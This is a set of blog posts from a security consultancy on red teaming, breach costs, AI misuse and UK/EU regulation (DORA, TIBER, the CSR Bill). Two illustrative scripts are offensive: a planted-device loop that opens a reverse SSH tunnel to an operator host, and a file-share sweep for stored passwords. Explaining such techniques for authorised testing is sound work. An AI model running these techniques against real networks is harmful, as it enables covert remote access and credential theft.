Why bother with Physical Breach Tests?

A physical red team (breach) test is a real-world simulation of a physical breach. Think: tailgating into a secure office, picking locks, planting rogue devices, or accessing server rooms without authorisation. Unlike standard security audits, red teamers think and act like real adversaries – covertly probing for the weakest link in physical security protocols, policies, and human behaviour.

We get asked on occasion to test organisations for this sort of breach (far too few organisations actually want this tested). Those that do ask understand that whilst most of their threats may arrive through digital means, a physical approach can be more impactful and easier to deliver. Some of the reasons we’ve seen for commissioning this type of test include:

Helpful Staff

No matter how high-tech your access control systems are, they mean little if an attacker can simply follow an employee through the door (a practice known as tailgating). Physical red team tests highlight how susceptible staff can be to social engineering tactics like impersonation, fake deliveries, or authoritative-sounding pretexts.

Exposed Infrastructure

Access to a single unsecured port in a server room or conference space can allow attackers to plug in malicious devices (like a Raspberry Pi or Bash Bunny), potentially leading to full network access. Red teamers often demonstrate just how quickly digital perimeters can be bypassed through a physical route.
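
To illustrate how little is needed once a device is on the network, below is a minimal sketch (in Python) of the kind of call-home loop a planted device might run during an authorised engagement: it repeatedly opens a reverse SSH tunnel so an operator can reach the device, and from it the internal network, from outside. The host name, account, ports and pre-provisioned key-based authentication are all hypothetical assumptions; real implants vary considerably.

```python
# Illustrative sketch only: the kind of call-home loop a planted device might run
# during an authorised engagement. The host, account, ports and pre-provisioned
# SSH key are hypothetical placeholders, not a real implant.
import subprocess
import time

OPERATOR_HOST = "ops.example-redteam.net"  # hypothetical operator-controlled host
REMOTE_PORT = 2222                         # port exposed on the operator host
LOCAL_SSH_PORT = 22                        # SSH service running on the planted device


def open_reverse_tunnel() -> None:
    """Open a reverse SSH tunnel so the operator can reach the device from outside."""
    subprocess.run(
        [
            "ssh", "-N",
            "-o", "ServerAliveInterval=30",
            "-o", "ExitOnForwardFailure=yes",
            "-R", f"{REMOTE_PORT}:localhost:{LOCAL_SSH_PORT}",
            f"redteam@{OPERATOR_HOST}",
        ],
        check=False,  # if the tunnel drops, we simply try again
    )


if __name__ == "__main__":
    # The device just keeps phoning home until it is collected or unplugged.
    while True:
        open_reverse_tunnel()
        time.sleep(60)
```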

Security Culture

Physical red team tests uncover issues beyond technical flaws: they reveal complacency, unclear protocols, and lack of awareness. When employees don’t challenge strangers, or when policies are not enforced in practice, that’s not just a failure of security—it’s a cultural problem.

Regulatory Pressure

As industries face stricter compliance requirements (e.g., NIST, ISO 27001, PCI-DSS), physical security is increasingly scrutinized. Some cyber insurance providers also now assess physical controls when pricing policies. Demonstrating that you’ve tested—and improved—your physical defences can reduce both regulatory risk and insurance premiums.

Actionable & Demonstrable

Unlike hypothetical risks or compliance checklists, red team results are concrete. They show exactly how an attacker got in, what assets were accessed, and where the defences broke down. These tests offer practical insights to improve training, upgrade systems, and harden physical defences.

Delivery of Testing

Before any physical red team test begins, legal authorisation is essential. Organisations should work with reputable providers who:

· Ensure written authorisation from executive leadership

· Clearly define the scope, targets, and rules of engagement

· Handle data collection, privacy, and evidence retention with care

· Respect employee dignity and avoid unnecessary disruption

This not only protects the business and the testers but ensures the activity remains ethical, controlled, and defensible.

At Prism Infosec, we not only have experience of conducting these sorts of engagements in a legal and risk-managed way, but can also provide advice, guidance and executive support in understanding and mitigating these sorts of threats.

If you would like to know more, please reach out and contact us:

Prism Infosec: Cyber Security Testing and Consulting Services

Abuses of AI

Much like Google and Anthropic, OpenAI have released their latest report on how threat actors are abusing AI for nefarious ends, such as using AI to scale deceptive recruitment efforts, or using AI to develop novel malware.

It is no surprise that, as AI has become more pervasive, cheaper and more readily accessible, threat actors are actively abusing it to further their own agendas. Having companies like Google, OpenAI and Anthropic openly discuss the abuses they are seeing is immensely helpful for understanding the threat landscape and the direction threat actors are taking.

These reports should be C-suite-level required reading. They contain nuggets of information that affect businesses, from recruitment practices to securing the perimeter, and best of all they are free to access.

Adversarial Misuse of Generative AI | Google Cloud Blog

Disrupting malicious uses of AI: June 2025

Detecting and Countering Malicious Uses of Claude \ Anthropic

At Prism Infosec, we not only use these reports to help inform our clients, but also feed them into our tabletop exercises and red team scenarios, so we can help our clients prepare for and defend against threat actors abusing these technologies.

If you would like to know more, please reach out to us.

Prism Infosec: Cyber Security Testing and Consulting Services

Why Not Test in Dev?

We frequently get asked by clients if we can run our red team tests in their DEV or UAT environments instead of production. We are told it is identical to production: same systems, dummy but representative data, same security controls, same user accounts, and so on.

We get it: DEV and UAT environments exist to de-risk changes to production. However, no matter how closely they resemble production, they are not what threat actors are going to target. No matter how similar an environment is, it won’t have the entire company working in it, providing the background noise that helps hide threat actor activity. And if alarms go off in it, are we absolutely certain they will be treated with the same priority as alarms in the production system, especially if multiple alarms are already going off in production?

Red team testing is only effective if it is conducted in the live, production environment, because we need to ensure that the organisation can defend the network that is most critical to the day-to-day running of the business. If your DEV or UAT environments go down, how long can your business operate compared to if your production systems go down?

At Prism Infosec we do appreciate the concerns about allowing red team testing on production environments. We do not want to disrupt your business. That’s why we have an exceptionally robust risk management strategy. We collaborate and manage risks to ensure the business can protect itself against realistic threats without unforeseen disruptions.

Talk to us today to find out more. Prism Infosec: Cyber Security Testing and Consulting Services

The Cost of a Breach

IBM’s 2024 Cost of a Data Breach report identified that the average cost of a data breach in the UK reached £3.58 million, a 5% increase on 2023.

Verizon’s 2025 Data Breach Investigations Report suggested there was a 37% increase in ransomware attacks being reported, with a median payout of $115,000 paid by 36% of victims, of which 88% were smaller businesses. Keep in mind, this is just the cost of decrypting the ransomware; when you consider lost productivity, reputational risk, shareholder losses, service impacts and potential fines, the cost skyrockets.

Even the European Union Agency for Cybersecurity (ENISA) has published a report discussing the impact of cyber security breaches across the financial sector; this reporting will only increase now that the Digital Operational Resilience Act (DORA) has come into force.

The news so far this year has identified a number of significant breaches: M&S, Co-Op, Harrods, Cartier, and North Face. More could be on the horizon, and the expectation is that this trend will only continue upwards.

Organisations do have tools to help them prepare for and potentially prevent these sorts of issues. Companies such as Prism Infosec offer red team engagements where, for a fraction of the cost of dealing with a breach, we simulate how these threat actors operate and help the organisation identify how they could be attacked, what they can do about it, and exercise how they would respond if or when a breach occurs, minimising the impact, disruption and damage these actors profit from. If your organisation is serious about managing the risk of being breached, then do reach out to us at Prism Infosec: Cyber Security Testing and Consulting Services so we can discuss how we can help secure your business.

ENISA Threat landscape: Finance sector

2025 Data Breach Investigations Report | Verizon

Cost of a data breach 2024 | IBM

AI and Red Teaming

Red teaming is still fairly young as far as cybersecurity disciplines go – most of us in this part of the industry have come in from penetration testing consultancy, or have some sort of background in IT security with a good mix of coding and scripting skills to develop tools. Our work often requires us not only to simulate threat actors as closely as we can, but also to manage the risks of our operations to avoid impacting our client’s business. This dichotomy of outcomes (simulating a threat actor whose objective is to disrupt, whilst simultaneously trying not to disrupt) may seem confusing, but we also need to remember what a red team is for: to help our clients test their detection and response capabilities. The objective of the red team is almost incidental – it merely sets a direction for the consultants to work towards whilst we determine what our clients can and cannot detect, and what they do about it if a detection occurs. That latter part is where disruption is more likely to occur, but even there we can manage the risks.

So where does AI come into it? Well, we have all seen the news about AI taking over jobs in a number of fields, and red teaming is not immune to those fears. The problem is that most AI systems these days are just really good guessers – I prefer to think of them as something closer to expert systems than a true intelligence. By that, I mean you can train them to be exceptional at specific tasks, but if you go too broad with them, they really struggle. They don’t explain themselves; they can’t repeat steps identically particularly well; and they often forget or hallucinate critical elements when faced with large and complex tasks. A red team is a very large and complex series of tasks where forgetting or imagining critical steps will often lead to a poor outcome. Add into that mix live environments and risk management, and the dangers of impacting a client become uncomfortably high. As a result, I have not yet met a single professional in this industry who would be happy to take the risk of letting a red team run entirely with AI, and I don’t see that changing any time soon.

However, I do see a future in which AIs help co-pilot red teams. By this I mean that, if the privacy concerns can be addressed, I can foresee a point where a private, specialist red team LLM would be permitted to ingest data the red team acquires during an engagement (such as network mapping information, directory listings, Active Directory data, file contents, source code, etc.) and perform analysis on it. It could then provide suggestions on how the engagement might proceed. It would also be able to answer questions rapidly for the red team, helping them consider further attack paths, identify additional issues in the environment, and suggest other things they could try. It could also quickly confirm whether the red team had interacted with particular systems within the client environment, to aid deconfliction if issues occur. In time I could even see this becoming a real-time benefit for client control groups, who would be able to interrogate the LLM for quicker answers about what the red team are doing and what has been identified to date.
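
As a purely illustrative sketch of the kind of assistant described above, the snippet below assembles engagement artefacts into a question-plus-context prompt for a privately hosted model. The `query_model` function, the file names and the prompt wording are all hypothetical placeholders rather than any real product or API.

```python
# Purely illustrative sketch of a red team "co-pilot" workflow. query_model() is a
# hypothetical stand-in for a privately hosted LLM; the artefact file names are examples.
from pathlib import Path


def load_artifacts(paths: list[Path], max_chars: int = 4000) -> str:
    """Concatenate engagement artefacts (AD exports, directory listings, etc.) into context."""
    chunks = []
    for path in paths:
        if not path.exists():
            continue  # skip missing artefacts in this toy example
        text = path.read_text(errors="ignore")[:max_chars]
        chunks.append(f"--- {path.name} ---\n{text}")
    return "\n\n".join(chunks)


def query_model(prompt: str) -> str:
    """Placeholder for a call to a private, engagement-scoped LLM."""
    return "(model response would appear here)"


def ask_copilot(question: str, artifact_paths: list[Path]) -> str:
    """Build a question-plus-context prompt from engagement data and ask the model."""
    context = load_artifacts(artifact_paths)
    prompt = (
        "You are assisting an authorised red team engagement.\n"
        f"Engagement data:\n{context}\n\n"
        f"Question: {question}\n"
        "Suggest possible next steps and flag anything the operators may have missed."
    )
    return query_model(prompt)


if __name__ == "__main__":
    print(ask_copilot(
        "Which hosts look most promising for lateral movement?",
        [Path("ad_users.txt"), Path("network_map.txt")],  # example artefact files
    ))
```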

AI is here now, and it’s evolving. We can’t really ignore it as it becomes a tool used more and more in everyday life, which means we need to find ways to make it work within the concerns we have. I personally feel that pushing these models into smaller, expert-system roles is the right way forward, as this allows them to fulfil the role of an assistant more fully. We also need to acknowledge that the public models have been trained unethically on source data taken without consent from authors and copyright holders. As their use grows, not only is there a considerable environmental impact, but I believe they will start to show strain in the near future. As the public further embraces these tools and uses them to generate new content, that AI-generated content will also be absorbed by LLMs. This risks a situation where the snake eats its own tail, turning the LLMs into an echo chamber, and we will see the quality of their output drop considerably. This will likely be compounded by people losing critical thinking skills, which ultimately will harm us more than the AIs can help us.

Data Hygiene

Most organisations that are breached and compromised are not victims because they are lax with security, have poor patching, or are gambling that they will never be a target; they usually suffer from poor data hygiene.

Users store data on desktops, in shared folders and in online repositories (such as Jira, SharePoint, Confluence, etc.), sometimes without appropriate controls, encryption, or consideration for who else may have access to it. As a result, threat actors who establish a foothold will often spend time sifting through these data repositories, harvesting credentials, testing whether they are valid and establishing what damage they can cause with them. This is a tactic we use in red teams to great effect when completing objectives. The days of needing to throw zero-days and exploits at networks to compromise them are not quite over, but why would any threat actor waste an exploit when an organisation’s data hygiene is poor and all the credential material they need is sitting in accessible file stores?
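
As a rough illustration of how low the bar can be, the sketch below shows the kind of naive sweep an attacker (or a red team) might run across an accessible file share, flagging lines that look like stored credentials. The share path and patterns are illustrative assumptions only; real tooling is considerably more thorough.

```python
# Naive illustration of sweeping an accessible file share for credential-like strings.
# The share path and patterns are illustrative assumptions; real sweeps are far more thorough.
import re
from pathlib import Path

CANDIDATE_PATTERNS = [
    re.compile(r"password\s*[:=]\s*\S+", re.IGNORECASE),
    re.compile(r"pwd\s*[:=]\s*\S+", re.IGNORECASE),
    re.compile(r"connectionstring.*password", re.IGNORECASE),
]
INTERESTING_EXTENSIONS = {".txt", ".cfg", ".ini", ".config", ".ps1", ".bat", ".xml", ".yml"}


def sweep(root: Path) -> None:
    """Walk the share and print file/line references that look like stored credentials."""
    if not root.is_dir():
        print(f"{root} is not accessible from here")
        return
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in INTERESTING_EXTENSIONS:
            continue
        try:
            lines = path.read_text(errors="ignore").splitlines()
        except OSError:
            continue  # unreadable file: skip and move on
        for number, line in enumerate(lines, start=1):
            if any(pattern.search(line) for pattern in CANDIDATE_PATTERNS):
                print(f"{path}:{number}: {line.strip()[:120]}")


if __name__ == "__main__":
    sweep(Path("/mnt/shared"))  # example mount point for an accessible file share
```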

Unfortunately, hunting across corporate data stores for poorly secured passwords is not easy; in all my years of testing I’ve not seen a single solution that is 100% effective at it. Instead it often requires multiple sweeps, policies, user education, users being provided with appropriate tools and guidance, amnesty periods and, if all else fails, disciplinary measures. Often the problem is not addressed until after a breach occurs, and worse still, most firms don’t realise how bad the situation might be.

At Prism Infosec, our red team engagements include analysis of your data hygiene, and we can help you address the issues we find.

DORA TLPT Guidance Update

Today the EU provided the long-awaited updated guidance in relation to DORA’s TLPT: DORA TLPT Guidance Update

This 30-page document further clarifies the necessity for Threat-Led Penetration Tests (TLPTs) under DORA.

We will be posting a more in-depth post about this in the very near future, but the key points that should be taken away are:

Who can Invoke a TLPT?

DORA’s TLPT requirements mirror the TIBER-EU methodology, processes and structures: DORA TLPTs will be overseen in the same way as TIBER-EU engagements, by either EU or national-level authorities. The authorities are defined as the single designated public authority for the financial sector; an authority in the financial sector that has been authorised and delegated to manage TLPTs; or any competent authority referred to in Article 46 of Regulation (EU) 2022/2554.

Who is in scope for a TLPT?

It will be down to the national or EU-wide authorities to determine who will be in scope for a TLPT; however, the guidance is clear that it should be restricted to entities for which it is justified. This can include financial entities that operate in core financial services subsectors, unless a TLPT cannot be justified for them.

Ultimately this means it will be down to the regulator’s discretion whether a TLPT should apply to any financial organisation, decided on a case-by-case basis. This will be based on an overall assessment of the organisation’s ICT (Information and Communications Technology) risk profile and maturity, its impact on the financial sector, and related financial stability concerns, assessed against qualitative criteria.

Article 2 of the update defines the specific requirements for identifying the financial entities required to perform TLPTs. Essentially, the authorities will consider the following factors:

  • The size of the entity
  • The extent and nature of the entity’s connections with other entities in the financial sector of one or more EU member states
  • The criticality or importance of the services the entity provides to the financial sector
  • The substitutability of services the entity provides
  • The complexity of the entity’s business model
  • The entity’s role in a wider enterprise with shared ICT systems

The authorities will also consider the following ICT risk-related factors:

  • The entity’s risk profile
  • The threat landscape for the entity
  • The degree of dependence their critical, important and supporting functions have on ICT systems
  • The complexity of the entity’s ICT architecture
  • The entity’s ICT services which are supported by third parties (including the quantity and contractual arrangements for third party and intra-group service providers)
  • The outcomes of any supervisory reviews relevant for assessment of the ICT maturity of the entity
  • The maturity of ICT business continuity plans and the ICT response and recovery plans
  • The maturity of ICT detection and mitigation controls
  • Whether the entity is part of a group that is active in the financial sector of the EU and shares ICT systems.

The expectation is that a TLPT will be required for entities such as:

credit institutions, payment and electronic money institutions, central securities depositories, central counterparties, trading venues, and insurance and reinsurance undertakings. The definitions for these types of entity are included in the update; many relate to their definitions in other EU articles (all referenced), to total payment transaction amounts within a two-year calendar period, or to undertakings with gross written premiums (GWPs) or technical provisions above specified levels. It should be noted, however, that these same entities could be excused from a TLPT if the authority agrees it is inappropriate.

The authority is also required to consider points such as market share position and the range of activities the financial entity provides when making this assessment.

Furthermore, these criteria must also be applied and assessed in light of new markets as they enter the financial sector, such as crypto-asset service providers authorised under Article 59 of Regulation (EU) 2023/1114 of the European Parliament and of the Council.

Shared ICT Service Providers

The guidance also touches on financial entities that share the same ICT service provider. In those cases, if a TLPT is deemed necessary, it will be down to the regulator whether a shared or entity-level assessment is conducted.

If a TLPT is deemed required by the authority, the financial entity will be contacted and clearly presented with the authority’s expectations regarding testing.

This regulation update will come into force 20 days after its publication (8th July 2025), so from that date entities could be contacted by letter from the authorities notifying them of the requirement to conduct a TLPT.

Additional Notes

Much of the rest of the regulation update covers the delivery of a TLPT with regard to the roles, responsibilities and expectations for TLPT providers (both threat intelligence and red team/penetration testing providers). It also covers the basic expectations for financial entities being tested with regard to secrecy, procurement and scoping of TLPT engagements. We will touch on those topics in more detail in a later blog post.

TIBER-BE Insights

The TIBER-EU framework is designed to help organisations improve their cyber resilience.

It has multiple stages: initiation (scoping, procurement, planning), threat intelligence, penetration testing (red teaming), purple teaming (attack replays, additional untested control tests, variances in attack methodologies working alongside the Blue team), and closure (reporting, remediation plans, attestation).

As a framework, TIBER can be used by any organisation, even though it was created for financial institutions. However, using the framework does not make your organisation compliant with the regulator or with DORA unless the test is supported by an EU TIBER regulator team and a TIBER test manager.

This information was presented and discussed at the NBB (National Bank of Belgium) TIBER-BE TLPT (Threat-Led Penetration Testing) launch event. The morning session was only for institutions who are, or will be, undergoing a TIBER, to inform them of the framework. Prism Infosec were invited to the event as suppliers, and joined other suppliers and the institutions to mingle and attend relevant presentations.

The NBB TIBER-BE team discussed their implementation of TIBER and how it will align with DORA. At present, additional guidance on the TLPT element of DORA is still pending (and has been since February), though it is expected at some point in June, which should help clarify the TLPT phase, requirements and implementation in greater detail. Until that arrives, DORA-compliant TLPT exercises cannot begin.

During the TLPT launch event there were a number of presentations. These included a keynote from the newly formed Belgian Cyber Force, a presentation on NIS2, and a presentation on the Belgian Cyber Fundamentals (CyFun) framework, which resembles the UK’s Cyber Essentials and is linked to the Belgian Centre for Cybersecurity, which has a role similar to the UK’s NCSC and can support Belgian entities during cyber incidents.

We also had a presentation on how one multinational Belgian organisation had implemented their own internal red team, what they learned along the way and, importantly, how they measured and demonstrated to the board how the organisation’s maturity and capability to defend itself improved over time.

The panel discussion contained a number of useful insights from a variety of C-suite-level individuals, some of whom had been through TIBER and others who were waiting to go through it. They shared insights into how to plan and prepare for engagements, suggesting organisations prepare by doing a small red team before their TIBER to understand the process. They recommended choosing scenarios where you will get key learnings and doing as much preparation for contingencies (leg-ups, backup accounts, information) as you can.

These presentations, panels, and even the quiz were all backed by networking discussions over food and soft drinks.

All in all, it was an insightful and useful event!

The Cyber Security and Resilience Bill – April 2025

In the King’s Speech it was announced that further details would follow about the CSR Bill, and it looks like we now have the confirmed and proposed measures:

Cyber Security and Resilience Bill: policy statement – GOV.UK

These have been proposed by both MPs and the Department for Science, Innovation and Technology (DSIT) and backed by the NCSC:

Cyber Security and Resilience Policy Statement to… – NCSC.GOV.UK

The bill looks to enhance the Network and Information Systems (NIS) 2018 Regulations:

The NIS Regulations 2018 – GOV.UK

Those regulations were aimed at providing legal measures for improving the security (both physical and cyber) of the IT systems that underpin digital services (online marketplaces, online search engines, cloud computing services) and essential services (transport, energy, water, health, and digital infrastructure). Twelve regulators were identified as responsible for enforcing them.

The major policy proposals and changes being introduced with the CSR Bill not only increase the number of entities covered by NIS 2018, but also enhance the powers of these regulators, whilst aligning the UK, where appropriate, with the approach taken in the EU’s NIS 2 directive:

Directive – 2022/2555 – EN – EUR-Lex

Understanding the Proposed UK Cyber Security Policy Changes

The UK government has laid out potential changes to its cyber security policy, aiming to bolster the nation’s resilience against evolving digital threats. These proposals encompass a range of measures designed to broaden the scope of regulation, strengthen supply chain security, and empower regulatory bodies. Here’s a breakdown of the key elements under consideration:

Expanding the Regulatory Framework

A significant aspect of the proposed changes involves bringing more entities under the umbrella of cyber security regulations.

  • Bringing More Entities into Scope: The policy seeks to extend its reach to organisations that play a crucial role in the digital ecosystem.
  • Managed Service Providers (MSPs) to be Regulated: Recognising the critical access MSPs have to client IT systems and their potential vulnerability to cyber-attacks, MSPs will now be subject to regulation.
    • Definition of MSPs: The policy defines MSPs as entities that:
      • Provide IT-related services to external organizations (not in-house).
      • Deliver services reliant on network and information systems.
      • Offer ongoing management, administration, or monitoring of IT infrastructure, networks, and cyber security activities.
      • Include network access or connection to a customer’s systems.
    • Regulatory Alignment: MSPs will be required to adhere to the same duties as relevant digital service providers (RDSPs), with the Information Commissioner’s Office (ICO) acting as their regulator.

Strengthening Supply Chain Security

The proposals also place a strong emphasis on securing the digital supply chain.

  • New Duties for OES and RDSPs: Operators of essential services (OES) and RDSPs will face new obligations to actively manage cyber risks within their supply chains.
  • Designation of ‘Critical Suppliers’ (DCS): Regulators may designate certain suppliers as ‘Critical Suppliers’ (DCS), even if they are small firms, if a disruption to their services could significantly impact essential or digital services.
    • Criteria for DCS Designation (Proposed, Not Yet Agreed): A supplier could be classified as a DCS if:
      • It provides goods or services to OES or RDSPs.
      • Disruption to its services would have a significant effect on the delivery of essential or digital services.
      • Its operations depend on network and information systems.
      • It is not already subject to similar cyber security regulations.
    • Obligations for DCSs: Once designated, DCSs will be subject to the same security and reporting requirements as OES and RDSPs.

Empowering Regulators & Enhancing Oversight

The proposed policy aims to equip regulatory bodies with greater authority and tools to effectively oversee cyber security practices.

  • Technical and Methodological Security Requirements: It is proposed that security requirements will be aligned with the National Cyber Security Centre’s (NCSC) Cyber Assessment Framework (CAF). Additionally, the Secretary of State may issue sector-specific codes of practice to tailor standards.
  • Improving Incident Reporting: The scope of reportable incidents will be broadened to include those impacting data confidentiality, integrity, and availability. Furthermore, a two-stage reporting process is being introduced (a short timing sketch follows this list):
    • An initial notification within 24 hours.
    • A comprehensive report within 72 hours.
    • Reporting will be mandatory to both the relevant regulator and the NCSC.
    • Firms will also be obligated to alert affected customers following significant incidents.
  • Strengthening ICO’s Information Powers: The ICO will be granted enhanced powers to proactively gather information and enforce registration requirements, and new channels will be established for other bodies to share threat intelligence with the ICO.
  • Improving Cost Recovery for Regulators: The proposed bill seeks to allow regulators to set fees, publish their charging principles, and consult with the industry. This aims to address cash flow issues and alleviate cost burdens on taxpayers.
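
To make the proposed reporting timeline concrete, here is a minimal sketch that computes the two deadlines from the point an incident is identified, assuming both windows run from that moment (the policy statement defines the precise trigger).

```python
# Minimal sketch of the proposed two-stage reporting timeline, assuming both windows
# run from the point the incident is identified (the policy statement defines the detail).
from datetime import datetime, timedelta, timezone


def reporting_deadlines(identified_at: datetime) -> dict[str, datetime]:
    """Return the initial-notification (24h) and full-report (72h) deadlines."""
    return {
        "initial_notification_due": identified_at + timedelta(hours=24),
        "full_report_due": identified_at + timedelta(hours=72),
    }


if __name__ == "__main__":
    incident = datetime(2025, 4, 1, 9, 30, tzinfo=timezone.utc)  # example detection time
    for stage, due in reporting_deadlines(incident).items():
        print(f"{stage}: {due.isoformat()}")
```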

Keeping Pace with Emerging Threats

The policy acknowledges the dynamic nature of cyber threats and the need for adaptability.

  • Delegated Powers: The Secretary of State will be granted the authority to update regulations through secondary legislation, following consultation. This is intended to enable swift responses to evolving threats and technological advancements.

Additional Measures Under Consideration

Beyond the core elements, the proposed bill also includes additional measures that may be incorporated later, depending on legislative opportunities:

  • Regulating Data Centres: Data centres with a capacity of ≥1MW (or ≥10MW for enterprise-only use), recognised as Critical National Infrastructure (CNI) in 2024, could be brought under regulation. This is estimated to affect approximately 182 data centres and 64 operators.
  • Statement of Strategic Priorities: The Secretary of State could publish a statement outlining strategic priorities for regulators every 3–5 years. This aims to ensure a consistent national cyber security strategy across different sectors and regulatory bodies.
  • Powers of Direction (National Security): The bill might be expanded to grant the Secretary of State the power to:
    • Direct entities to take specific actions against particular cyber threats.
    • Instruct regulators to tighten sector-specific guidance.
    • It is anticipated that these powers would only be invoked when necessary and proportionate to address national security concerns.

These proposed policy changes represent a significant step towards strengthening the UK’s cyber resilience in an increasingly complex digital landscape. Businesses and organisations across various sectors should pay close attention to the development and implementation of this legislation.

Roles & Responsibilities

As can be seen above, the bill will affect several types of entity; we have tried to summarise them below:

Managed Service Providers (MSPs)
  • Definition / characteristics: provide services to other organisations (not in-house); rely on network/information systems; involve ongoing IT system management or monitoring; have network access.
  • Role & obligations: newly regulated; same duties as RDSPs; must follow cyber security and incident reporting requirements.

Relevant Digital Service Providers (RDSPs)
  • Definition / characteristics: digital services such as online marketplaces, search engines and cloud providers.
  • Role & obligations: already regulated under NIS 2018; subject to enhanced incident reporting and transparency duties.

Small & Micro RDSPs
  • Definition / characteristics: smaller digital service providers currently exempt.
  • Role & obligations: may be regulated if designated as a Critical Supplier.

Operators of Essential Services (OES)
  • Definition / characteristics: organisations providing essential national services.
  • Role & obligations: existing regulation under NIS; will have new duties to manage supply chain risk.

Designated Critical Suppliers (DCS)
  • Definition / characteristics: supplier to an OES or RDSP; disruption could significantly affect service; relies on IT/network systems; not regulated elsewhere.
  • Role & obligations: will be brought under regulation; must meet security and incident reporting standards.

Data Centres (Proposed)
  • Definition / characteristics: facilities hosting data infrastructure; thresholds of ≥1MW capacity (general) or ≥10MW (enterprise-only).
  • Role & obligations: expected to be included; duties include registration, risk management and incident reporting.

Regulators
  • Definition / characteristics: the ICO and sector-specific bodies.
  • Role & obligations: enforce the regulations; gain stronger powers for oversight, cost recovery and cyber threat monitoring.

Summing Up

Ultimately, the impact of the CSR Bill will be wide-ranging. It will seek to provide stronger protection of critical services, enhance supply chain security, improve regulatory oversight and capabilities, improve incident response, provide regulators with flexibility and some futureproofing, and improve national security and government readiness. The cost for businesses that have not previously fallen under these requirements, both in preparing for these new obligations and in complying with them, will be high. However, the cost of a breach and of disruption to these services, not just to the organisation but to the wider supply chain and the country, will be significantly higher.

Prism Infosec’s cybersecurity services already work with several regulated industries and regulators; if you would like to discuss this with us, please feel free to reach out.

Capitalising on the Investment of a Red Team Engagement

Cybersecurity red teams are designed to evaluate an organisation’s ability to detect and respond to cybersecurity threats. They are modelled on real-life breaches, giving an organisation an opportunity to determine whether it has the resiliency to withstand a similar breach. No two breaches are entirely alike, because no two organisations grow their infrastructure, organically or by design, in the same way. Environments are often built around their initial purpose before being reshaped by acquisitions and evolving requirements. As such, the first stage of every red team, and of every real-world breach, is understanding the environment well enough to pick out the critical components that act as a springboard to the next element of the breach. Hopefully, somewhere along that route detections will occur, and the organisation’s security team can stress-test their ability to respond and mitigate the threat. Regardless of the outcome, however, too often once the scenario is done the red team hands in a report documenting what they were asked to do, how it went, and what recommendations would make the organisation more resilient. But is that enough?

Detection and Response Assessments are part of the methodology for the Bank of England and FCA’s CBEST regulated intelligence-led penetration testing (red teaming). However, their interpretation of it is more aligned to understanding response times and capabilities. At LRQA (formerly LRQA Nettitude), I learned the value of a more attuned Detection and Response Assessment, a lesson I brought with me and evolved at Prism Infosec.

At its heart, the Detection and Response Assessment takes the output of the red team and turns it on its head: it examines the engagement through the eyes of the defender. We identify at least one instance of each of the critical steps of the breach – the delivery, the exploitation, the discovery, the privilege escalation, the lateral movement, the action on objectives. For each of those, we look to identify whether the defenders received any telemetry. If they did, we look to see whether any of that telemetry triggered a rule in their security products. If it triggered a rule, we look to see what sort of alert it generated. If an alert was generated, we then look to see what happened with it – was a response recorded? If a response was recorded, what did the team do about it? Was it closed as a false positive, or did it lead to the containment of the red team?
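
As a simple way to picture that cascade, the sketch below models the five questions as a small data structure and walks each critical step until it finds where the chain broke. It is a minimal illustration of the idea, not our internal tooling.

```python
# Minimal illustration of the "five so-what questions" cascade in a Detection and
# Response Assessment. A simplified model of the idea, not internal tooling.
from dataclasses import dataclass


@dataclass
class StepAssessment:
    step: str                  # e.g. "Delivery", "Privilege escalation"
    telemetry_received: bool   # 1. Did the defenders receive any telemetry?
    rule_triggered: bool       # 2. Did that telemetry trigger a rule in a security product?
    alert_generated: bool      # 3. Did the rule generate an alert?
    response_recorded: bool    # 4. Was a response recorded?
    contained: bool            # 5. Did the response contain the red team?

    def verdict(self) -> str:
        """Walk the questions in order and report where the chain broke, if it did."""
        if not self.telemetry_received:
            return "Gap: no telemetry reached the defenders"
        if not self.rule_triggered:
            return "Gap: telemetry received but no detection rule fired"
        if not self.alert_generated:
            return "Gap: a rule fired but no alert was raised"
        if not self.response_recorded:
            return "Gap: an alert was raised but no response was recorded"
        if not self.contained:
            return "Partial: responded, but the activity was not contained (e.g. closed as a false positive)"
        return "Strong: detected, responded to and contained"


if __name__ == "__main__":
    steps = [
        StepAssessment("Delivery", True, True, True, False, False),
        StepAssessment("Lateral movement", True, False, False, False, False),
        StepAssessment("Action on objectives", True, True, True, True, True),
    ]
    for assessment in steps:
        print(f"{assessment.step}: {assessment.verdict()}")
```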

Five “so what” questions, at the end of which we have either identified a gap in the security system or process, or identified good, strong controls and behaviours. There is more to it than that, of course, but from a technical delivery point of view, this is what will drive benefits for the organisation. A red team should be able to highlight the good behaviours as well as the ones that still require work, and a good Detection and Response Assessment not only results in the organisation validating its controls but also in it understanding why defences didn’t work as well as they should. This allows the red team to present the report with an important foil: how the organisation responded to the engagement. It shows the other side of the coin, in a report that will be circulated at a senior level alongside the engagement findings, and can set the entire engagement in stark contrast.

The results can be seen, digested and understood by C-suite executives. There is little value in running a red team only to report to the board that, because of poor credential hygiene or outdated software, the organisation was breached and remains at risk. The board already knows that security is expensive and that they are at risk, but if a red team can also demonstrate the benefits, or direct security funding more efficiently by helping the organisation understand the value of that investment, then it becomes a much more powerful instrument of change. What’s even better is that it can become a measurable test – we can see how that investment improves things over time by comparing results between engagements and using that to tweak or adjust.

One final benefit is that security professionals on both sides of the divide (defenders and attackers) gain substantial amounts of knowledge from such assessments – both sides lift the curtain and explain the techniques, the motivations, and the limitations of the tooling and methodology. As a result, both sides become much more effective, build greater respect, and are more willing to collaborate on future projects when not under direct test.

Next time your company is considering a red team, don’t just look at how long it will take to deliver or the cost, but also consider the return you are getting on that investment in the form of what will be delivered to your board. Please feel free to contact us at Prism Infosec if you would like to know more.

Our Red Team Services: https://prisminfosec.com/service/red-teaming-simulated-attack/